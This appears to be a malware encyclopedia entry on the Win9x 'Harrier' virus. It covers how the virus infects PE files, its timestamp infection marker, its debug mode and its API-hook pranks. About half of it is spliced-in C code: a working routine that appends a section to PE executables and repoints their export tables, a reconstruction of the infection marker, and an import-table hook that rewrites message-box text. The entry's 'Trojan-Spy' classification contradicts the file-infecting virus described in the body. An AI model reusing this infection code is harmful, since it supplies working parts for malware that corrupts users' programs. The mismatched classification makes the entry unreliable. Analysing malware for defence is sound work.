Class
Trojan-Spy
Platform
Win9x

Parent class: TrojWare

Trojans are malicious programs that perform actions which are not authorized by the user: they delete, block, modify or copy data, and they disrupt the performance of computers or computer networks. Unlike viruses and worms, the threats that fall into this category are unable to make copies of themselves or self-replicate. Trojans are classified according to the type of action they perform on an infected computer.

Class: Trojan-Spy

Trojan-Spy programs are used to spy on a user's actions (to track data entered by keyboard, make screen shots, retrieve a list of running applications, etc.). The harvested information is then transmitted to the malicious user controlling the Trojan. Email, FTP, the web (including data in a request) and other methods can be used to transmit the data.


Platform: Win9x

No platform description

Description

Technical Details

When infecting a PE EXE file, the virus parses the file's internal format, creates one more section at the end of the file and writes its encrypted body there. The virus section is followed by the virus's own Export table, which the virus uses to link its code to the Windows API functions it needs when an infected file is executed. Because the virus has its own Export table, it modifies the pointer to it in the PE header. The virus also pays special attention to the host file's original Export table: to preserve it, the virus moves the necessary data from it to the end of the file and appends it to its own Export table. As a result, when Windows loads an infected file, it processes both the virus's and the host's Export tables.

To link its section to the body of the victim file, the virus modifies the necessary fields in the PE header (at a minimum the section count and the image size, which any appended section requires). It does this accurately, and as a result infected files load without errors in most cases, even under Windows NT.
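The two header edits described above, appending a section and repointing the export data directory at it, as an added example in C. This is illustration code written for this page, not the virus's own routine: the sample image in make_sample() is constructed inline and is not a real host, the offsets follow the documented PE32 layout, and the example only repoints the export directory and hands back the host's old RVA rather than reproducing the merge of the host's export entries into the virus table.

```c
/* Added example: append a section to a PE32 image held in memory and repoint
 * the export data directory at it. Illustration code, not the virus's own;
 * make_sample() builds a constructed image, not a real host file. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static void wr32(uint8_t *p, uint32_t v) { p[0] = v; p[1] = v >> 8; p[2] = v >> 16; p[3] = v >> 24; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = v; p[1] = v >> 8; }
static uint32_t align_up(uint32_t v, uint32_t a) { return (v + a - 1) / a * a; }

/* Append `data` as a new last section. Returns its RVA, or 0 on failure;
 * *buf is reallocated and *len updated. */
uint32_t pe_append_section(uint8_t **buf, size_t *len, const char name[8],
                           const uint8_t *data, uint32_t data_len, uint32_t chars)
{
    uint8_t *b = *buf;
    if (*len < 0x40 || rd16(b) != 0x5A4D) return 0;                   /* "MZ" */
    uint32_t pe = rd32(b + 0x3C);
    if (pe + 24 + 224 > *len || rd32(b + pe) != 0x00004550) return 0; /* "PE\0\0" */
    uint8_t *fh = b + pe + 4, *oh = fh + 20;                          /* file header, optional header */
    if (rd16(oh) != 0x10B) return 0;                                  /* PE32 only */
    uint16_t nsec = rd16(fh + 2), opt_size = rd16(fh + 16);
    uint32_t sec_align = rd32(oh + 32), file_align = rd32(oh + 36);
    uint32_t size_of_image = rd32(oh + 56), size_of_headers = rd32(oh + 60);
    uint32_t sh = pe + 24 + opt_size;                                 /* first section header */
    /* The new 40-byte header must fit in the header area, before the first section's raw data. */
    if (sh + (uint32_t)(nsec + 1) * 40 > size_of_headers) return 0;
    uint32_t new_va  = align_up(size_of_image, sec_align);
    uint32_t raw_ptr = align_up((uint32_t)*len, file_align);
    uint32_t raw_len = align_up(data_len, file_align);
    uint8_t *nb = realloc(b, raw_ptr + raw_len);
    if (!nb) return 0;
    memset(nb + *len, 0, raw_ptr + raw_len - *len);                   /* alignment slack */
    memcpy(nb + raw_ptr, data, data_len);
    uint8_t *h = nb + sh + nsec * 40;
    memcpy(h, name, 8);
    wr32(h + 8, data_len); wr32(h + 12, new_va);                      /* VirtualSize, VirtualAddress */
    wr32(h + 16, raw_len); wr32(h + 20, raw_ptr); wr32(h + 36, chars);/* raw size/ptr, Characteristics */
    wr16(nb + pe + 4 + 2, (uint16_t)(nsec + 1));                      /* NumberOfSections */
    wr32(nb + pe + 24 + 56, new_va + align_up(data_len, sec_align));  /* SizeOfImage */
    *buf = nb; *len = raw_ptr + raw_len;
    return new_va;
}

/* Point DataDirectory[0] (export table) at `rva`; returns the host's old RVA so it can be kept. */
uint32_t pe_set_export_dir(uint8_t *b, uint32_t rva, uint32_t size)
{
    uint8_t *dd = b + rd32(b + 0x3C) + 24 + 96;
    uint32_t old = rd32(dd);
    wr32(dd, rva); wr32(dd + 4, size);
    return old;
}

/* Constructed sample: 0x200 bytes of headers and one 0x200-byte .text section. */
uint8_t *make_sample(size_t *len)
{
    *len = 0x400;
    uint8_t *b = calloc(1, *len);
    wr16(b, 0x5A4D); wr32(b + 0x3C, 0x40); wr32(b + 0x40, 0x00004550);
    uint8_t *fh = b + 0x44, *oh = fh + 20, *sh = oh + 224;
    wr16(fh, 0x14C); wr16(fh + 2, 1); wr16(fh + 16, 224);             /* i386, 1 section, PE32 opt header */
    wr16(oh, 0x10B); wr32(oh + 28, 0x400000); wr32(oh + 32, 0x1000);  /* Magic, ImageBase, SectionAlignment */
    wr32(oh + 36, 0x200); wr32(oh + 56, 0x2000); wr32(oh + 60, 0x200);/* FileAlignment, SizeOfImage, SizeOfHeaders */
    wr32(oh + 92, 16);                                                /* NumberOfRvaAndSizes */
    memcpy(sh, ".text\0\0\0", 8);
    wr32(sh + 8, 0x100); wr32(sh + 12, 0x1000); wr32(sh + 16, 0x200); wr32(sh + 20, 0x200);
    wr32(sh + 36, 0x60000020);                                        /* code | execute | read */
    return b;
}

int main(void)
{
    size_t len; uint8_t *img = make_sample(&len);
    uint8_t body[300]; memset(body, 0xCC, sizeof body);               /* stand-in for the encrypted virus body */
    uint32_t va = pe_append_section(&img, &len, ".harr\0\0\0", body, sizeof body, 0xE0000020);
    uint32_t old = pe_set_export_dir(img, va + 0x10, 0x40);
    printf("new section RVA 0x%x, file now %zu bytes, old export RVA 0x%x\n", va, len, old);
    free(img);
    return 0;
}
```

The room check before writing the new header is the point where careless infectors fail: if the existing section headers already fill SizeOfHeaders, the appended header overwrites the first section's raw data, and the stricter NT loader refuses the file. For detection, the same parser can flag an image whose last section's raw data lies beyond every other section and whose export directory RVA points into that section.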

The virus recognises already infected files by a marker stored in the file's last-write date and time stamp. The marker value is not constant: it depends on the other fields of the file's date and time (the virus ROLs, RORs and XORs five of them to calculate the ID).
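A marker of this kind, derived from the rest of the FAT date/time and stored in the seconds field, as an added example in C. The code is written for this page and is not the virus's routine: the particular ROL/ROR/XOR mix in marker_for() is an assumption made for illustration, and the sample dates are constructed here.

```c
/* Added example: an infection marker kept in the file's FAT last-write
 * date/time. The ROL/ROR/XOR mix in marker_for() is assumed for
 * illustration, not the virus's real formula. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

typedef struct { uint16_t dos_date, dos_time; } dos_stamp;   /* FAT-packed words as DOS/Win9x report them */

static uint8_t rol8(uint8_t v, unsigned n) { n &= 7; return (uint8_t)((v << n) | (v >> ((8 - n) & 7))); }
static uint8_t ror8(uint8_t v, unsigned n) { n &= 7; return (uint8_t)((v >> n) | (v << ((8 - n) & 7))); }

dos_stamp make_stamp(int year, int month, int day, int hour, int min, int sec)
{
    dos_stamp s;
    s.dos_date = (uint16_t)(((year - 1980) << 9) | (month << 5) | day);
    s.dos_time = (uint16_t)((hour << 11) | (min << 5) | (sec / 2));    /* 2-second resolution */
    return s;
}

/* Marker derived from the five fields the stamp leaves untouched (assumed mix). */
uint8_t marker_for(dos_stamp s)
{
    uint8_t year = (uint8_t)(s.dos_date >> 9), month = (s.dos_date >> 5) & 0x0F, day = s.dos_date & 0x1F;
    uint8_t hour = (uint8_t)(s.dos_time >> 11), min = (s.dos_time >> 5) & 0x3F;
    uint8_t id = rol8(year, 3) ^ ror8(month, 2) ^ rol8(day, 1) ^ ror8(hour, 4) ^ min;
    return id & 0x1F;                                      /* only 5 bits fit in the seconds/2 field */
}

/* Write the marker into the seconds/2 field, leaving date, hour and minute as they were. */
dos_stamp stamp_infected(dos_stamp s) { s.dos_time = (uint16_t)((s.dos_time & ~0x1Fu) | marker_for(s)); return s; }

/* What the virus checks before infecting, and what a scanner must recompute per file. */
bool is_marked(dos_stamp s) { return (s.dos_time & 0x1F) == marker_for(s); }

int main(void)
{
    dos_stamp clean = make_stamp(1999, 5, 7, 13, 42, 30), infected = stamp_infected(clean);
    printf("marker %u, marked before %d, after %d\n", marker_for(clean), is_marked(clean), is_marked(infected));
    return 0;
}
```

Because the marker is a function of the other fields rather than a fixed value, a scanner cannot look for one magic timestamp; it has to recompute the function. The 5-bit field also means roughly one clean file in 32 matches by chance, so the virus skips those files and a detector must not treat the marker alone as proof of infection.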

Trigger routines

While installing itself in memory, the virus calls three of its trigger routines. The first checks the system environment and, depending on it, switches the virus into "debug mode". The second, depending on the seconds value of the system time, displays the MessageBox:

The last one, depending on the virus's random counter (which is derived from the system date and time), in one case out of sixteen drops the OEMINFO.INI and OEMLOGO.BMP files into the Windows system directory. The OEMINFO.INI file contains the following text strings in two sections:

[General]
Manufacturer=TechnoRat
Model=Very large life zone for Harrier
[Support Information]
line1=Today the virus is not the virus,
line2=but the part of operating system. . .
line3=(C) by 95-th Harrier from DarkLand
line4=---
line5=The pretty LOGO picture was created
line6=by PolyGris and LionKing. Main idea
line7=and code of all versions was developed
line8=by me - TechnoRat
The BMP file and the [General] section are shown in the System Properties window when My Computer / Properties is selected. The virus's [Support Information] section is displayed when the corresponding button in the same System Properties window is pressed.

The virus's "debug mode" is activated when the system environment contains a specific string (a "Variable=Value" pair, as set for instance by the DOS SET command). The string is 19 characters long and is recognised by the virus with a simple CRC-like loop. This loop reduces the string to four bytes, so several million readable strings produce the same value and any of them activates the mode.

When the virus's debug mode is on, it displays the message box:

The virus then displays a MessageBox on each infection and requests permission to infect the file, for example:

On "OK" the virus runs its infection routine; on "Cancel" it displays one more MessageBox and exits:

The virus's USER32 and GDI32 API hooks are also used in its trigger routines: the virus changes the texts that are displayed, or outputs its own messages.

On the 16th time an infected application calls the WinHelpA function, the virus displays its own MessageBox instead of calling the Windows function:

"95-th Harrier from DarkLand"
God will help! ;-)
On any MessageBoxA call the virus checks the system time and, depending on it, replaces the original MessageBox text with one of six variants:

System malfunction!
VXDs rings overcrossed!
CPU mode thunking error!
CPU overclocked, cooler device emergency!
Help subsystem is damaged!
Attention! Bugs inside computer, use SoftIce.

On other hooked calls the virus scans the text for four substrings and replaces them with its own versions:

MICROSOFT  -> MIcrOSOFT
WINDOWS    -> WINDOwS
BILL GATES -> Gill Bates
HARRIER    -> Oh! Guys! Is it about me?
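The hooking behaviour described in this section, as an added example in C: an import-table style hook on a MessageBoxA-shaped function that rewrites the text argument before the real call, using the four substitutions and the six replacement messages listed above. This is illustration code written for this page, not the virus's own. The stand-in import table, the case-insensitive matching and the "seconds % 6" choice of replacement message are assumptions; the page does not say how the virus installs its hooks or selects the message.

```c
/* Added example: an import-table style hook that rewrites MessageBox text.
 * The stand-in import table, case-insensitive matching and "seconds % 6"
 * selection are assumptions for illustration; not the virus's own code. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

typedef int (*msgbox_fn)(const char *text, const char *caption);
struct host_iat { msgbox_fn MessageBoxA; };      /* stand-in for the host's USER32 import entry */

static const char *from[] = { "MICROSOFT", "WINDOWS", "BILL GATES", "HARRIER" };
static const char *to[]   = { "MIcrOSOFT", "WINDOwS", "Gill Bates", "Oh! Guys! Is it about me?" };
static const char *alarms[] = { "System malfunction!", "VXDs rings overcrossed!",
    "CPU mode thunking error!", "CPU overclocked, cooler device emergency!",
    "Help subsystem is damaged!", "Attention! Bugs inside computer, use SoftIce." };

/* One of the six replacement texts, picked from the time-of-day seconds (assumed rule). */
const char *alarm_text(unsigned seconds) { return alarms[seconds % 6]; }

static int prefix_ci(const char *s, const char *upper_pat)
{
    for (; *upper_pat; s++, upper_pat++)
        if (toupper((unsigned char)*s) != (unsigned char)*upper_pat) return 0;
    return 1;
}

/* Copy `in` to `out` applying the four substitutions. Returns the new length,
 * or -1 if the result would not fit (the HARRIER replacement grows the text). */
int rewrite_text(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    while (*in) {
        int hit = -1;
        for (int i = 0; i < 4 && hit < 0; i++)
            if (prefix_ci(in, from[i])) hit = i;
        size_t n = hit < 0 ? 1 : strlen(to[hit]);
        if (o + n >= outsz) return -1;
        memcpy(out + o, hit < 0 ? in : to[hit], n);
        o += n;
        in += hit < 0 ? 1 : strlen(from[hit]);
    }
    out[o] = '\0';
    return (int)o;
}

static msgbox_fn real_MessageBoxA;                      /* saved original pointer */
static int hooked_MessageBoxA(const char *text, const char *caption)
{
    char buf[256];
    if (rewrite_text(text, buf, sizeof buf) < 0) return real_MessageBoxA(text, caption);
    return real_MessageBoxA(buf, caption);
}

/* Patch the import entry so the host's calls land in the hook first. */
void hook_install(struct host_iat *iat) { real_MessageBoxA = iat->MessageBoxA; iat->MessageBoxA = hooked_MessageBoxA; }

static char last_shown[256];                            /* what the stand-in "Windows" function received */
static int stand_in_MessageBoxA(const char *text, const char *caption)
{
    (void)caption; snprintf(last_shown, sizeof last_shown, "%s", text); return 1;
}

/* Install the hook on a stand-in table and call through it; returns the text that reached the stand-in. */
const char *demo_hooked_call(const char *text)
{
    struct host_iat iat = { stand_in_MessageBoxA };
    hook_install(&iat);
    iat.MessageBoxA(text, "Demo");
    return last_shown;
}

int main(void)
{
    printf("%s\n", demo_hooked_call("Bill Gates owns Microsoft Windows"));
    printf("%s\n", alarm_text(7));
    return 0;
}
```

The one substitution that lengthens the text (HARRIER) is why the hook needs its own bounded buffer and a fall-through to the original call when the rewritten text does not fit; an in-place rewrite of the caller's string would overrun it.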
